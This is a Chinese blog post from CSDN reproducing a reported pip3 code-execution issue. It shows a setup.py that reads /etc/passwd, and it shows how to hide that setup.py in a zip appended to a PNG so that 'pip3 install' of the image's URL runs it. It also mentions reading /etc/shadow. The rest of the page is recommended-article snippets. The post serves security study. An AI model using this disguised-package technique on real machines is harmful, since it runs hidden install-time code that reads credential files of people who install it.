Linux pip3 rce复现

最新推荐文章于 2023-01-05 13:31:20 发布
最新推荐文章于 2023-01-05 13:31:20 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 安全学习 文章标签: linux 安全 python pip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50618290/article/details/127543066
版权

近日曝出Linux下面的pip有rce然后第一时间进行复现,但是由于工作忙没时间写,现在写一下。

首先看网上出现的png图片:

根据网上说法,需要把图片变成zip文件后就能看到POC文件,其实如果打过CTF的大佬应该知道原理了,就是CTF MISC中的文件隐写,用图片方式把zip文件压缩起来了。使用binwalk查看文件:

 证实了猜想,里面有zip文件,还是名为test的,然后有一个setup.py文件。其中setup.py中就有poc,我们这里直接使用poc复现:

 

f = open("/dev/tty", "w")
print(open("/etc/passwd").read(),file=f)

然后保存为setup.py,接着创建一个test1文件夹(文件夹名称无所谓),放在里面,压缩为zip文件,这里为test1.zip,然后使用cmd,随便找一张png的图片,使用命令:copy /b 123.png + test1.zip 666.png然后合并为一张图片就行了:

 使用python直接起一个http环境,直接在Linux中使用命令:pip3 install "http://xxx.xxx.xxx.xx/666.png就行:

命令执行成功,经测试,版本从pip2的版本不行,pip3从9.X到23.X都可以,目测应该是pip3的通杀。

写在最后:该漏洞感觉危害不是很大,首先是该命令执行目前只能读取文件,注意是读取文件,而不可以执行ifconfig,more,cat这些系统命令;其次,该命令执行可以读取root权限文件,如上图,我使用kali账号,但是复现时可以读取/etc/shadow文件(这里不截图了)说明可以读取高权限文件,这个感觉在CTF比赛中可能用得到吧(PS好像我打过的比赛中很多是python2,然后或者就是没有python环境的,难不成以后下载一个帮它安上?问题又来了安装软件要系统权限,既然有root权限我为何不直接cat flag还要这种方法?)。所以感觉截止发稿,好像也没见大面积讨论吧,估计确实鸡肋。

 

1024不进位
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-21972 Vmware vcenter未授权 获取linux RCE-细节
qq_40015778的博客
02-26 1806
CVE-2021-21972 Vmware vcenter未授权 获取linux RCE-细节 在本文中,我将介绍如何发现VMware vSphere客户端RCE漏洞,泄露技术细节并说明如何在各种平台上利用它。 发现漏洞 在对vSphere Client进行分析的过程中,我一如既往地采用了黑盒和白盒两种方法进行测试,重点关注未经授权即可利用的漏洞。从Web面板,我尝试发送尽可能多的不同请求,所有请求都没有Cookie标头。 向发送未经授权的请求后/ui/vropspluginui/rest/services
Linux复现 Google Chrome RCE
zyer
12-13 834
Linux服务器复现google chrome rce
复现linux下的ls -l命令
YaoYMXX的博客
09-26 220
尝试实现ls -l 命令的功能函数
Linux系统下,pip/pip3的本地命令执行漏洞复现
weixin_48421613的博客
10-25 1030
怎么说呢,可以,但是没必要,因为这个洞只能本地利用,其次就是用于供应链、社工钓鱼还行,但是我想这个Poc…应该也许可能没人点吧。下载之后是主机文件其实是Rce.png,而后将格式更改成zip文件,可以看到其实文件的主体就是如下的。其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。我们本地复现,本地利用python3环境开始临时的http环境。首先脚本地址是在github的。就这样,就可以了,点到即止​。很简单很明了,干干净净~而后靶机环境是kali哈。
linux论文复现路径
微信号:Custom-Software
07-25 331
看到下面的: /path/to/cityscapes Generate coco_img. ROOT=/path/to/snake 分为意思是在:cityscapes、coco_img、snake文件夹下进行操作
linux安装pip pip3
11-08
用来安装pippip3同时安装共存
pip3-21.3.1离线包
02-23
离线安装pip3-21.3.1;(linux、windows通用) 安装方式:tar xf pip3-21.3.1.tar.gz && cd pip-21.3.1 && python3 setup.py install 解压离线包 && 进入解压目录 && pythonpython3进行安装; 验证:pip3 --...
Linux 下安装pip包的方法
09-15
一旦pip安装完成,你就可以通过`pip`或`pip3`命令来安装Python库了。例如,安装一个名为`requests`的库: ```bash pip install requests ``` 或者针对Python 3: ```bash pip3 install requests ``` 记得,为了...
python3常用的pip3安装包
10-18
Python3的生态系统中,`pip3`是默认的包管理工具,用于安装、升级和管理Python软件包。它使得开发者能够方便地从Python Package Index (PyPI) —— 官方的第三方Python库仓库,获取和安装各种依赖。 离线安装...
linux下安装python3和对应的pip环境教程详解
09-14
你可以通过`python3`命令启动Python解释器,使用`pip3`来安装和管理Python包。 这个过程对于任何需要在Linux环境中使用Python3和pip的开发者都是必要的。注意,根据你的Linux发行版和系统设置,可能需要进行适当的...
linuxrce远程代码执行漏洞,初见RCE(远程命令/代码执行漏洞)
weixin_35382961的博客
05-08 820
RCE全称:remote command/code execute分为远程命令执行ping和远程代码执行evelPing(Packet Internet Groper)是Windows、Linux和Unix系统下的一个命令。ping也是因特网包探索器,用于测试网路连接量的程序,其工作在TCP/IP网络体系结构中应用层的一个服务命令。ping可以检查网络连接是否能连接,是否顺畅,能帮助我们诊断网络故...
Linux系统漏洞复现分析,Linux环境下常见漏洞利用技术
weixin_42357719的博客
04-29 468
记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html),不过当时开始学pwn不久,很多理解有偏差.现在时间过去了一年多,还经常有朋友发私信问我其中的实例程序还在不在,很遗憾我自己也没有了哈:)前不久要给别人做个这方面的培训,于是写了这个ppt,其中有我自己一些粗浅的理解...
Linux/Ubuntu/CentOS等完美复现前人输入的命令(学习Linux的骚操作)---history命令
九粒花生米的博客
06-25 308
起因 最近刚入职,跟着公司的小“导师”多次出入进出机房在服务器端进行日志查询等操作,但是我只对他狂敲键盘后的神采,却对他的大部分Linux命令并不晓得啥意思,也不方便一个个问,只好心里默默记下来各个命令,回头自己查意思了。但是自己的记忆能力也不算强,总是遗忘好多,所以就希望能有一个复现前人操作的命令。 没想到,百度之后,还真有。所以说:遇到不会的问题一定要多多百度谷歌,答案基本都有的。 具体操作命...
linuxrce远程代码执行漏洞,Alpine Linux远程代码执行漏洞分析
weixin_31626765的博客
05-08 168
研究人员在Alpine Linux的默认包管理器中apk中发现了一些漏洞。Alpine与Docker非常类似,是一种轻量级的Linux发行版。这些漏洞允许网络中间人(恶意包镜像)在用户机器上执行任意代码。而当默认仓库不支持TLS时,这个问题更加严重。目前该bug已修复,Alpine镜像也已更新。在获取代码执行权限后,研究人员找出一种在/proc//mem中写入的方式使用原始的apk进程用0退出状态...
Linux 应用市场易受RCE和供应链攻击,多个0day未修复
smellycat000的专栏
06-23 390
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也...
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2344
RCE(命令执行)总结
python function terminated un_绕过 RestrictedUnpickler
weixin_39673303的博客
12-11 361
阅读:892上周跑模型的间隙,看到一个关于 Python Pickle 反序列化的 CTF 题,和以往见到的不太一样,感觉很有意思,遂打算研究一下。0x00 Pickle 反序列化我们知道,当我们控制了如 `pickle.loads`等序列化数据的输入接口时,我们可以通过构造恶意的 Payload 来达到任意代码执行的效果。这是因为, `pickle` 库在反序列化(unpickling)的过程中...
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
Python的文件操作
weixin_34209851的博客
05-03 125
Python的文件操作: 打开文件;open函数 open的方式有三种 1,r(read-only)也是python中默认的文件打开模式 2,w(write-only)只写模式,比较危险,会覆盖当前文件内容 3,a(append)追加模式,对文件追加内容 读取文件: 读取的方式有三种 read() 每次读取整个文件内容,并且赋值到一个变量,如果文件大于内存。是不能实现这种方...
linuxpip3安装
最新发布
09-10
要在Linux上安装pip3,可以按照以下步骤进行操作。首先,需要准备工作,包括安装python3的依赖项和下载python3安装包。可以使用命令`sudo apt-get install python3-dev`来安装python3的依赖项。然后,可以使用以下...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值